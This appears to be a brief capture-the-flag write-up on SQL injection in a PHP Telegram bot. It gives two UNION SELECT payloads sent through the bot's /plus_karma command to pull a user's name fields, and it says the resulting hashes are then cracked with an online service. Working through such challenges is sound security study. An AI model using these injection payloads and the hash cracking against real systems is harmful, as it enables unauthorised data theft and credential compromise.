Tags: sqli bot php telegram sqlinj
We can see sqlinj there in multiple queries, we need to construct evil query to got name of id 13
Also we know table structure, so
/plus_karma -1 union select first_name from users where id=13
/plus_karma -1 union select last_name from users where id=13
We got hashes, so lets decrypt it with crackstation and submit flag.